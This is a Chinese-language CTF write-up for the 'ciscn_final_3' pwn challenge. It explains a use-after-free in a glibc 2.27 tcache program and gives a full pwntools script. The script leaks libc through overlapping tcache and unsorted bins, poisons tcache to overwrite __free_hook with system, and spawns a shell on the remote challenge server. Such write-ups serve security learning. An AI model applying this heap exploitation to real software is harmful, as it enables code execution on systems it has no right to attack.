ciscn_final_3

ciscn_final_3

程序給的glibc版本爲2.27，存在tcache機制

首先檢查一下程序的保護機制

然後，我們用IDA分析一下

Delete功能存在UAF漏洞

程序沒有show的功能，但是add時，會顯示堆的地址。

爲了能夠泄露出glibc地址，我們就要依靠這個add時打印的堆地址。我們只要讓tcache bin和unsorted bin重合，那麼就能通過申請，把堆申請到main_arena處，打印堆地址時，返回的就是main_arena的地址。由於glibc版本爲2.27，因此很容易利用，要得到unsorted bin範圍的chunk，我們只需要篡改chunk的頭部，然後多次free。

#coding:utf8
from pwn import *

#sh = process('./ciscn_final_3')
sh = remote('node3.buuoj.cn',29193)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
free_hook_s = libc.symbols['__free_hook']
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']

def add(index,size,content):
   sh.sendlineafter('choice >','1')
   sh.sendlineafter('input the index',str(index))
   sh.sendlineafter('input the size',str(size))
   sh.sendafter('now you can write something',content)
   sh.recvuntil('gift :')
   heap_addr = int(sh.recvuntil('\n',drop = True),16)
   return heap_addr

def delete(index):
   sh.sendlineafter('choice >','2')
   sh.sendlineafter('input the index',str(index))

#0
add(0,0x70,'a'*0x70) - 0x10
#1
heap_addr = add(1,0x70,'b'*0x70) - 0x10
for i in range(2,10):
   add(i,0x70,'c'*0x70)

#10
add(10,0x10,'e'*0x10)
print 'heap_addr=',hex(heap_addr)
#double free
#多弄幾個，使得size最後不會變成負數
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)
delete(0)

#修改tcache的next指針，同時，設置chunk1的prev_size域爲chunk1本身的地址，這樣，我們申請到chunk1的頭部時,next指針就對應了prev_size域
#由此繼續形成了循環鏈表
add(11,0x78,p64(heap_addr) + 'a'*0x68 + p64(heap_addr + 0x10))
add(12,0x70,'a'*0x70)

#修改chunk1的頭信息，使得1~9的大小合併
add(13,0x70,p64(heap_addr) + p64(0x80*9 + 1))
#獲得unsorted bin
delete(1)
add(14,0x70,'d')
#申請到main_arena裏，從而獲得libc地址
main_arena_xx = add(15,0x70,'e')
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(0)
delete(0)
add(16,0x70,p64(free_hook_addr))
add(17,0x70,'/bin/sh\x00')
#寫free_hook
add(18,0x70,p64(system_addr))
#getshell
delete(17)

sh.interactive()